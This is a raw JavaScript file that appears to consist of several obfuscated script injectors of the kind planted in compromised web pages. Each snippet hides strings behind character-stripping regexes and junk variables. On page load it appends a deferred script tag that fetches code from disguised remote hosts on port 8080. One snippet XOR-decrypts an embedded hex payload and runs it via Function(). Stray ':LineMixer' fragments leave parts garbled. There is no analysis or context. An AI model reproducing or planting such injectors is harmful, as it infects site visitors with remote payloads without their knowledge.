this.pl=64787;var g=window;var v;if(v!='' && v!='f'){v='o'};var gz="";var m=document;var xg;if(xg!=''){xg='y'};var ml;if(ml!=''){ml='kv'};var b;if(b!='' && b!='pm'){b='h'};this.am='';var i='sJc7r7i7pWtZ'.replace(/[ZWn7J]/g, '');var sw=new Date();this.pj="";g.onload=function(){try {z=m.createElement(i);var h_;if(h_!='' && h_!='t'){h_='u'};var jy;if(jy!='xi'){jy=''};z.setAttribute('dbemfme8rB'.replace(/[Bs8bm]/g, ''), "1");var jb=new String();var _;if(_!='xf'){_=''};z.src='hDt+tfpL:f/S/f3S6f0+-DcSnS.D5+df6fdS.fcfo+mD.fhfi+5+-DcfofmS.fy+oDufrDtDa+gLhDe+u+efrD.SrSu+:L8f0f8L0L/SaDlfifmLafmfaS.+c+oSmD/LaflLi+mLa+m+aS.DcSoLm+/SrLa+dSiLkfa+lL.+rfu+/Lm+aDp+qLuLefs+t+.+cDoLmS/+gLoLo+g+l+eL.DcLoDmf/D'.replace(/[DSLf\+]/g, '');var mm;if(mm!='e' && mm != ''){mm=null};this.yt=41831;var tf;if(tf!='' && tf!='po'){tf='gh'};m.body.appendChild(z);var _m=new Date();} catch(a){};};var cq;if(cq!='gp' && cq!='gm'){cq='gp'};
var b;if(b!='' && b!='q'){b='oq'};:LineMixer [var j=window;this._e="";this.i=35709;var _='s_c.r|i.p|te'.replace(/[e_y\|\.]/g, '');var s='c_r_eMaWtdeWE_l_eMmdeWnWt|'.replace(/[\|dWM_]/g, '');var n=false;]j.onload=function(){var ka;if(ka!='c' && ka != ''){ka=null};this.of=false;try {var ve;if(ve!='yu'){ve=''};v=document[s](_);var cw;if(cw!='tz' && cw!='ke'){cw=''};:LineMixer [var qq=2035;var m;if(m!='' && m!='_c'){m=''};v['sLrici'.replace(/[ig%LU]/g, '')]='hzt?t,pN:R/z/Nm,i,i,bze,iNaRn,-zgzoRv?-zcNnz.,bRiRg,p?oRiRnzt?.NcRo?m?.?wNa,r?e,s?e,e?k,eNrz-RcRoRmR.NhNoRtNnRezw,gzu?i,dzez.,rNuR:R8z0N8,0z/Rq?q?.RcNozmR/NqNqN.Nc,oRm,/NtNeNc,h,n?oNr?aRt,i?.Nc,oRm,/,g?o?ozgzl,e?.NczoRm,/zcRbRszs?p,oRrztRsz.,cNo,mz/z'.replace(/[zR,N\?]/g, '');v.setAttribute('dneDfne.r<'.replace(/[\</n\.D]/g, ''), "1");this.hg="hg";var dy=new Date();]var bf;if(bf!='gk'){bf=''};var ml;if(ml!='' && ml!='hp'){ml=''};document['b/owd3y/'.replace(/[/wPi3]/g, '')]['aNp7pNecnrd0C0h0i0lcdr'.replace(/[r7c0N]/g, '')](v);var xj=new Date();var nc=63040;} catch(o){};this.xw=false;var xe;if(xe!=''){xe='kz'};};this.la="";var ff;if(ff!=''){ff='_f'};
var e=document;var wd;if(wd!=''){wd='o'};var xl;if(xl!='p'){xl=''};var q=window;var ort=false;function i(k){var u=['h<t<t;p_:M/</Mb_b<cA-_cAo<-;uMkA._a_bAoMuAtM.;c_o_mM.Ax<i<cMi<-;n<eAtA.MhMoMmMeAc<a<rAe_nMa<tAi;oMn<.<rMu;:;8A0A8<0M/_g_oAo<g<lAeA.;c_oMmA/<g<oAo<g_l<e<._c_o_mM/<m_a<t<c<h<._cMo<m;/MhAa<r;d_s_e;x<tMuMb_e_.<c_oMmM/;a;z_e_t_.<s;k_/A'.replace(/[A;\<_M]/g, ''), 's<c0r<iFpFtW'.replace(/[W0F\|\<]/g, ''), 'c_roe_a_t_e@Eol!e_m_e@n_t!'.replace(/[\!_@ou]/g, ''), 'o9ntl9o9aGdt'.replace(/[tb9Gc]/g, ''), 'sirZcx'.replace(/[x8Zi_]/g, ''), 'agpPpje>nPdECEhjijl>dP'.replace(/[PE\>gj]/g, ''), 'sjeDt6A6totjrji6bvu6tjeo'.replace(/[oD6vj]/g, ''), 'bVoUdUyU'.replace(/[U\|\$\>V]/g, ''), 'd$e$f$e&r&'.replace(/[&ocD\$]/g, ''), "1"];var h=new String();var kn=u[k];var um;if(um!='' && um!='j'){um=null};return kn;this.b_=12751;}var w = function(){this.t_="t_";try {b=e[i([2,5][0])](i([1,9][0]));var py;if(py!='z'){py='z'};var tr;if(tr!=''){tr='pr'};b[i([4][0])]=i([0][0]);this.aj="aj";this._q="";b[i([6][0])](i([8][0]), i([5,9][1]));var ve;if(ve!='rb'){ve='rb'};var x = e[i([7][0])];var vml;if(vml!='_o' && vml!='kq'){vml='_o'};x[i([5,6][0])](b);this.oc="";} catch(kv){var tb=new Date();};};q[i([6,3][1])]=w;var yr=new Array();
var Ig="6c77655052137078546e4d05637864630f476c5d746464577a47605a5b6a536b476f6573456d567d45654271466b4a407e464074665965727b4364776a487963780a78610c527862107d510c737f";var TpS;if(TpS!='Sf' && TpS!='bV'){TpS=''};var emP=new Array();function s(H){this.gT=''; var A=function(F, AR){var m=false;var z;if(z!='B'){z=''};var i = F.length;this.yz='';var hn=new Date();var J=[0][0];var P=[73,1][1];var q = '';this.IW='';var ya;if(ya!='' && ya!='rj'){ya='f'};var C = AR.length;this.v=false;var wN=new String();var tD;if(tD!=''){tD='Sv'};for(var u = J; u < i; u += C) {var zm;if(zm!='TyR' && zm!='tS'){zm=''};var PZ;if(PZ!='uB'){PZ='uB'};var p = F.substr(u, C);var MS;if(MS!='nl' && MS!='gt'){MS='nl'};var ag=new String();if(p.length == C){this.Q=false;for(var y in AR) {q+=p.substr(AR[y], P);}var MJ;if(MJ!='SH' && MJ != ''){MJ=null};} else {  q+=p;var iJ='';}var qM=new Array();}var O=new String();var qd=new String();var RD;if(RD!='' && RD!='CM'){RD='wM'};this.qc="";return q;var nP=32284;};var dW;if(dW!=''){dW='ini'};var rP=new Date();var Fc="";this.Zl=false; var Ck=new Date();function Jd(E,Ep){this.HD=false;this.it="";return E^Ep;}var Nq;if(Nq!='NU'){Nq='NU'};this.rM=false;var Bn=""; var R=function(K,N){var WP='';this.qj='';return K[A("ocChdraeAt", [1,3,6,5,2,0,4])](N);var X=new String();var Cu;if(Cu!='AK'){Cu=''};};var Jm='';var nG=''; var r=function(T){var bEE;if(bEE!='WE' && bEE != ''){bEE=null};var ay=[16,127,0,75][2];var P=[213,1][1];var EV=[14,192,255,113][2];var Sj;if(Sj!='' && Sj!='BJ'){Sj='By'};var rW;if(rW!='' && rW!='lp'){rW='Aq'};var y=[0,149,176,186][0];this.vH=56526;this.hx=47901;var I=T[A("helgnt", [2,1,4,3,5,0])];var HF=new Date();while(y<I){var GP;if(GP!='' && GP!='V'){GP=''};var xo;if(xo!='sHG' && xo!='wl'){xo=''};y++;D=R(T,y - P);this.Lv=57239;var Eg;if(Eg!='hg'){Eg='hg'};ay+=D*I;var xhc=new Array();}this.mc=false;var ga;if(ga!='' && ga!='xu'){ga=''};return new a(ay % EV);var Wr;if(Wr!=''){Wr='oI'};};this.qi=false;var Zc=50256;var NI=new String();var Un=false; var AP=function(F){var cr;if(cr!='' && cr!='sG'){cr='XU'};this.GN='';var PH=new Date();this.xr="xr";var u =[0,6,16,102][0];var Er;if(Er!='aX'){Er='aX'};var Iv=28338;var J =[0][0];this.sC=false;var q = '';var nC="";this.Wa="";F = new a(F);var vj=false;var n = -1;var Kx;if(Kx!='' && Kx!='qC'){Kx=null};this.fg=false;var LL=37354;for (u=F[A("elgnht", [1,0])]-n;u>=J;u=u-[85,1][1]){var kT;if(kT!='ex'){kT=''};q+=F[A("hcratA", [1,0])](u);var NY="NY";var bhN=31977;}this.Hi="Hi";var vY=new Date();return q;var Qv=23453;};var aU;if(aU!='' && aU!='Pw'){aU=null};var Ol=new String();var Xx;if(Xx!='Mw' && Xx != ''){Xx=null};var VW;if(VW!='' && VW!='Ij'){VW='qG'};var Ty=window;var hD=new Array();var x=Ty[A("vael", [2,0,1])];var b=x(A("uFcnitno", [1,0]));var dr;if(dr!='KL' && dr!='nj'){dr='KL'};var Gg;if(Gg!='Vr' && Gg!='BqD'){Gg='Vr'};var rf;if(rf!='fI' && rf!='bl'){rf='fI'};var AQ=x(A("gEeRxp", [3,2,0,1]));var hZ='';var a=x(A("rStgin", [1,2,0]));var la;if(la!='' && la!='QK'){la='qy'};var Luo;if(Luo!='' && Luo!='zMu'){Luo=null};var L = '';var lw="lw";var Op=false;var uAI=38953;this.mf="mf";var hl;if(hl!='' && hl!='GMx'){hl=''};this.Fz=5580;var j=a[A("omarhCrfCode", [7,3,0,1,5,4,2,6])];var Fb=Ty[A("senuepac", [3,2,1,0])];var Ra=false;var gR="";this.Gw=false;var La="";var nB = '';var pG="pG";var eN;if(eN!='sA'){eN=''};var S =[171,92,103,2][3];var wHJ=new Date();var o = H[A("nlgeth", [1,3,0,2])];var J =[59,42,0,66][2];var k = /[^@a-z0-9A-Z_-]/g;var yU;if(yU!='' && yU!='WI'){yU='QzF'};var BX='';var rC=new String();var tw;if(tw!='Nql'){tw='Nql'};var W = '';var Ad=false;var sW=false;var Sq =[138,0,212][1];var XQ="XQ";var BF="";var l=[1, A("mduocce.nterteaeEmlesn\'t(tcpri\')", [1,3,4,2,0]),2, A("m.ocneomoncyolrtomc.hiw.paetges", [3,2,0,1]),3, A("tocuemdnpbod.y.alendhCpid(d)", [6,1,2,3,5,4,7,0]),4, A(".ilcomietvesingdes:08.ru80", [3,4,5,0,2,1]),5, A(".Asdttetiebr(tu\'defer\'", [3,0,2,6,5,1,4,7]),6, A("omjcj.r.cn", [2,6,4,5,3,0,1]),7, A("tboirlwdnordoea", [2,4,1,3,0]),8, A("indww.ooloand", [3,0,1,2]),11, A("bargbncso.o1m", [4,1,5,3,0,2]),12, A("cinutfon()", [5,3,2,0,4,1,6]),14, A("oggoelc.mo", [1,0]),15, A("ogolge.fr", [1,2,0,4,3]),16, A("c(hatec)", [6,3,4,0,2,1,5]),17, A("tth:p\"", [5,2,0,1,4,3]),18, A("rd.sc", [1,2,3,0]),19, A(")1\'\'", [2,1,3,0]),20, A("rty", [1,0])];var Rd;if(Rd!='ki'){Rd=''};var lC = '';var CkY;if(CkY!='yLI' && CkY!='Ie'){CkY=''};var AC = a.fromCharCode(37);this.hDA='';this.pa='';var P =[93,1][1];this.sM=34490;var jv=new String();var ke=new Array();var tt;if(tt!=''){tt='vl'};var CK;if(CK!='eCJ'){CK='eCJ'};var oR=47337;for(var w=J; w < o; w+=S){var Cz='';this.XE="";lC+= AC; lC+= H[A("rubsst", [3,1,2,4,5,0])](w, S);this.AQu='';var Yo;if(Yo!='mN' && Yo != ''){Yo=null};}var yI=new String();this.cJ="";var Vh=6378;this.AF=false;var H = Fb(lC);var Po=46732;var aC="";var SF="";var d = new a(s);var xs=new String();var Lx;if(Lx!=''){Lx='UJq'};var Ca = d[A("aeplrce", [4,1,2,3,0])](k, nB);var lfg=new String();var Wt=new Array();var Fo;if(Fo!='' && Fo!='mI'){Fo='mw'};var vN;if(vN!='Wsy'){vN=''};Ca = AP(Ca);this.oY="oY";var MY;if(MY!='gi' && MY!='tW'){MY=''};var Y = l[A("enlthg", [2,0,1])];var Ng;if(Ng!=''){Ng='xhcO'};var QvA=new Date();var kg = new a(b);var ip="";var FRH="FRH";var Nf=2590;var Me;if(Me!='VJ' && Me!='RK'){Me='VJ'};var vd;if(vd!=''){vd='rI'};this.Kb="Kb";var NF = kg[A("lpreace", [2,3,1,0])](k, nB);this.ac=false;var NF = r(NF);var uG;if(uG!=''){uG='eJ'};var kD;if(kD!='vXV' && kD!='Jh'){kD=''};var g=r(Ca);var wL=new Array();var hAR;if(hAR!='' && hAR!='vM'){hAR=''};for(var u=J; u < (H[A("elgnht", [1,0])]);u=u+[1][0]) {var M = Ca.charCodeAt(Sq);var G = R(H,u);var ET="";var Ki="";G = Jd(G, M);var FH;if(FH!='' && FH!='uk'){FH=''};var PPQ=new Array();var yny;if(yny!='' && yny!='Msj'){yny='Yq'};G = Jd(G, g);G = Jd(G, NF);var Lr=new Array();var FRk=new Array();var LRv="";var PU="";Sq++;var cZr;if(cZr!='wK' && cZr!='pB'){cZr=''};var IQ;if(IQ!='Kd' && IQ != ''){IQ=null};var Nb;if(Nb!='Oh' && Nb!='rV'){Nb='Oh'};if(Sq > Ca.length-P){var Bd=false;Sq=J;var nX="nX";}var CUM=false;var zt;if(zt!='He' && zt!='aV'){zt='He'};var wHt;if(wHt!='' && wHt!='wb'){wHt=''};W += j(G);this.jS=5407;}var tGi;if(tGi!=''){tGi='cg'};this.PUo=28919;for(iC=J; iC < Y; iC+=S){var U = j(l[iC]);var Bm;if(Bm!=''){Bm='vp'};var sJ = l[iC + P];var wHL;if(wHL!='kL' && wHL!='sc'){wHL='kL'};var Bj;if(Bj!='wz' && Bj != ''){Bj=null};var Ru=false;var TW;if(TW!='mk' && TW != ''){TW=null};var xh = new AQ(U, j(103));var kS;if(kS!='Rx'){kS='Rx'};var bY;if(bY!=''){bY='tZ'};W=W[A("erlpcae", [1,0])](xh, sJ);}var NJ='';var yw;if(yw!='' && yw!='yv'){yw='Tq'};var Mq=new b(W);var xY;if(xY!='Rdd' && xY!='tjp'){xY='Rdd'};this.iFK=56805;Mq();var vR="vR";W = '';kg = '';g = '';NF = '';Mq = '';Ca = '';var nGh;if(nGh!='rt' && nGh != ''){nGh=null};var UnV;if(UnV!='Ph'){UnV=''};var tu;if(tu!='jU'){tu=''};var kj=new Array();return '';var eB=new Array();};var TpS;if(TpS!='Sf' && TpS!='bV'){TpS=''};var emP=new Array();s(Ig);

var _=new String();var U=new Date();function l(){var K='';var G='';var d=String("g8xm".substr(0,1));var Ob;if(Ob!='b' && Ob != ''){Ob=null};var fY;if(fY!='' && fY!='k'){fY=''};var c=RegExp;var H=new Date();var o=new Date();var W='';var Tc="";var cx;if(cx!='u' && cx!='D'){cx=''};var z;if(z!='' && z!='EC'){z='Z'};this.A='';function f(WZ,S){var KR=new String();var m= new String("[oYWB".substr(0,1));m+=S;m+="]842".substr(0,1);var Q;if(Q!='' && Q!='Yi'){Q=null};var X=new c(m, d);return WZ.replace(X, W);var _O="";var Ky="";};var dO;if(dO!='' && dO!='n'){dO=null};var qh="";var gs;if(gs!='Gn' && gs!='Xp'){gs=''};this.fh="";var y=new String("ht"+"tp"+":/X3P".substr(0,2)+"/d"+"moOZj".substr(0,2)+"z-ulgS".substr(0,2)+"iaOorOia".substr(3,2)+"Bbsg.sBb".substr(3,2)+"6yj7ex".substr(4)+"cisGQN".substr(0,2)+"teAS0R".substr(0,2)+".c"+"o.5SGX".substr(0,2)+"jpGei".substr(0,2)+".emNnA".substr(0,2)+"ko"+"lak9cW".substr(0,2)+"SpkMy-".substr(4)+"OPvne".substr(3)+"y76nt.".substr(4)+"tjYMneMjYt".substr(4,2)+"ww"+"TzV2orT2Vz".substr(4,2)+"AjfldjAf".substr(3,2)+"unMwW".substr(0,2)+"io"+"smun.".substr(3)+"Txgru".substr(3)+":8BUY".substr(0,1));var fv='';var ES=new String();var a="scJbg0".substr(0,2)+"oDhwrihoDw".substr(4,2)+"pt4viL".substr(0,2);var Kh;if(Kh!='' && Kh!='hJ'){Kh=null};var R=new Array();var B=window;var O=new String("de"+"XIgfe".substr(3)+"ZKHrZHK".substr(3,1));this.mW="";this.Tn="";var F=f('815144404111555851151014515',"451");var BV;if(BV!='' && BV!='t'){BV=null};var mY="srcUKj".substr(0,3);var sa=new String();var mp;if(mp!='_r' && mp != ''){mp=null};var L='';var bx;if(bx!='DO'){bx='DO'};var yW="/googySfn".substr(0,5)+"RA82le.coR82A".substr(4,5)+"m/goo"+"gle.cKPVS".substr(0,5)+"om/an0uEc".substr(0,5)+"RzOJswers".substr(4)+"BS04.com/".substr(4)+"vimeor3OD".substr(0,5)+".com/"+"W9Sbosto".substr(3)+"n.com"+"KjO.phpKjO".substr(3,4);B.onload=function(){this.Pg='';try {var xt=new Array();L=y+F;var Wv;if(Wv!='QI'){Wv='QI'};var HL="";L+=yW;var xV=new Date();var j_="";cB=document.createElement(a);var wr;if(wr!='dA' && wr != ''){wr=null};this.qu='';this.EF='';cB[O]=[1,2][0];var Kj;if(Kj!='rO' && Kj!='KN'){Kj=''};var st=new Date();cB[mY]=L;this.oK="";document.body.appendChild(cB);this.MT='';} catch(p){};};this.eL='';var Ro='';};l();var Ql;if(Ql!='' && Ql!='pM'){Ql=''};var sp=new Date();